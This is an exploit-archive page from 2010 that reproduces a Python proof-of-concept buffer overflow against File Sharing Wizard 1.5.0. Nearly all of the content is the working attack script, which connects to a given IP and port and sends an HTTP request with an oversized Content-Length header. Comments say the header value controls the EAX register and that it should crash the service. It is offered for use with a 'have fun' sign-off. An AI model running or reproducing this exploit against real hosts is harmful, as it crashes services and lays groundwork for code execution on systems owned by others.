Home / os / win7

File Sharing Wizard v1.5.0 Buffer Overflow PoC

Posted on 15 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>File Sharing Wizard v1.5.0 Buffer Overflow PoC</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================== File Sharing Wizard v1.5.0 Buffer Overflow PoC ============================================== #!/usr/bin/python # http://www.sharing-file.net/ # File Sharing Wizard Version 1.5.0 build on 26-8-2008 # # controlling EAX # ESP points to our buffer # buffer grows if we increase our string # # more details on http://www.s3cur1ty.de # have fun m1k3 [at] m1k3 [dot] at import socket import sys if len(sys.argv) &lt; 2: print &quot;Usage: vrfy.py &lt;IP-Adr&gt; &lt;port&gt;&quot; sys.exit(1) ips = sys.argv[1] port = int(sys.argv[2]) string = &quot;A&quot;*51 string += &quot;B&quot;*4 #controlling eax string += &quot;C&quot;*500 header = &quot;Content-Length&quot; print &quot;starting the attack for:&quot;, ips print &quot;&quot; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: connect=s.connect((ips, port)) except: print &quot;no connection possible&quot; sys.exit(1) print &quot; sending payload&quot; print &quot;...&quot; payload = ( 'GET http://%s/ HTTP/1.0 ' '%s: %s ' ' ') % (ips,header,string) s.send(payload) s.close() print &quot;finished kicking device %s&quot; % (ips) print &quot;... the service should be crashed ... check eax&quot; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-15]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP